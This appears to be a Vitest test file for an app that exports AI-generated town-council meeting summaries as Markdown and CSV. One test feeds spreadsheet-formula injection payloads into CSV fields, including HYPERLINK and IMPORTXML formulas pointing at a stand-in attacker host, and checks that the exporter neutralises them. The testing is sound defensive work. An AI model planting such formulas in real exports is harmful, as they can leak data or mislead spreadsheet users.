import { describe, expect, it } from "vitest";
import {
	buildReporterCsv,
	buildReporterExportFilename,
	buildReporterMarkdown,
} from "./reporterExport";

const MEETING_DATE = Date.UTC(2026, 5, 15, 19);

describe("reporter exports", () => {
	it("builds copy-ready Markdown with source-backed summary context", () => {
		const markdown = buildReporterMarkdown(reporterMeeting);

		expect(markdown).toContain("# Town Council Regular Meeting");
		expect(markdown).toContain("Coventry, CT");
		expect(markdown).toContain("June 15, 2026");
		expect(markdown).toContain(
			"Caveat: This export is AI-generated by Civic Observatory and is not official minutes.",
		);
		expect(markdown).toContain("Council reviewed budget and grant items.");
		expect(markdown).toContain("## Key Decisions");
		expect(markdown).toContain("### Approve capital budget");
		expect(markdown).toContain("Vote: passed 5-2-1");
		expect(markdown).toContain("Topics: budget, infrastructure");
		expect(markdown).toContain("Source: https://example.test/agenda.pdf");
		expect(markdown).toContain("Source type: scraped");
		expect(markdown).toContain("Source content hash: summary-content-hash");
		expect(markdown).not.toContain("private-user-id");
		expect(markdown).not.toContain("subscription-secret");
	});

	it("builds escaped CSV rows for reporter analysis", () => {
		const csv = buildReporterCsv(reporterMeeting);

		expect(csv.split("\n")[0]).toBe(
			"section,title,description,vote,topics,source_url,meeting_date,municipality,caveat",
		);
		expect(csv).toContain(
			'"executive_summary","Town Council Regular Meeting","Council reviewed budget and grant items.","","budget; housing","https://example.test/agenda.pdf","2026-06-15","Coventry, CT","AI-generated by Civic Observatory; not official minutes."',
		);
		expect(csv).toContain(
			'"key_decision","Approve capital budget","Approved the five-year capital plan.","passed 5-2-1","budget; infrastructure","https://example.test/agenda.pdf","2026-06-15","Coventry, CT","AI-generated by Civic Observatory; not official minutes."',
		);
		expect(csv).not.toContain("private-user-id");
		expect(csv).not.toContain("subscription-secret");
	});

	it("neutralizes spreadsheet formulas in CSV cells", () => {
		const csv = buildReporterCsv({
			...reporterMeeting,
			title: '=HYPERLINK("https://attacker.test","click")',
			summary: {
				...reporterMeeting.summary,
				executiveSummary: '+IMPORTXML("https://attacker.test", "//x")',
				keyDecisions: [
					{
						title: "@formula",
						description: "-dangerous",
						topics: ["\tbudget"],
					},
				],
				discussionTopics: [
					{
						topic: "\rtopic",
						summary: "\nsummary",
						category: "=category",
					},
				],
			},
		});

		expect(csv).toContain(
			'"\'=HYPERLINK(""https://attacker.test"",""click"")"',
		);
		expect(csv).toContain('"\'+IMPORTXML(""https://attacker.test"", ""//x"")"');
		expect(csv).toContain('"\'@formula"');
		expect(csv).toContain('"\'-dangerous"');
		expect(csv).toContain('"\'\tbudget"');
		expect(csv).toContain('"\'\rtopic"');
		expect(csv).toContain('"\'\nsummary"');
		expect(csv).toContain('"\'=category"');
	});

	it("builds stable export filenames", () => {
		expect(buildReporterExportFilename(reporterMeeting, "md")).toBe(
			"coventry-town-council-regular-meeting-2026-06-15.md",
		);
		expect(buildReporterExportFilename(reporterMeeting, "csv")).toBe(
			"coventry-town-council-regular-meeting-2026-06-15.csv",
		);
	});
});

const reporterMeeting = {
	title: "Town Council Regular Meeting",
	meetingDate: MEETING_DATE,
	sourceUrl: "https://example.test/meeting-page",
	sourceType: "scraped",
	contentHash: "meeting-content-hash",
	municipality: {
		name: "Coventry",
		state: "CT",
	},
	summary: {
		executiveSummary: "Council reviewed budget and grant items.",
		keyDecisions: [
			{
				title: "Approve capital budget",
				description: "Approved the five-year capital plan.",
				voteResult: {
					yes: 5,
					no: 2,
					abstain: 1,
					passed: true,
				},
				topics: ["budget", "infrastructure"],
			},
		],
		discussionTopics: [
			{
				topic: "Housing",
				summary: "Members discussed affordable housing incentives.",
				category: "housing",
			},
		],
		upcomingItems: [{ title: "Budget hearing", expectedDate: "2026-07-01" }],
		topics: ["budget", "housing"],
		sourceUrl: "https://example.test/agenda.pdf",
		sourceType: "scraped",
		sourceContentHash: "summary-content-hash",
		privateUserId: "private-user-id",
		subscriptionToken: "subscription-secret",
	},
} as const;
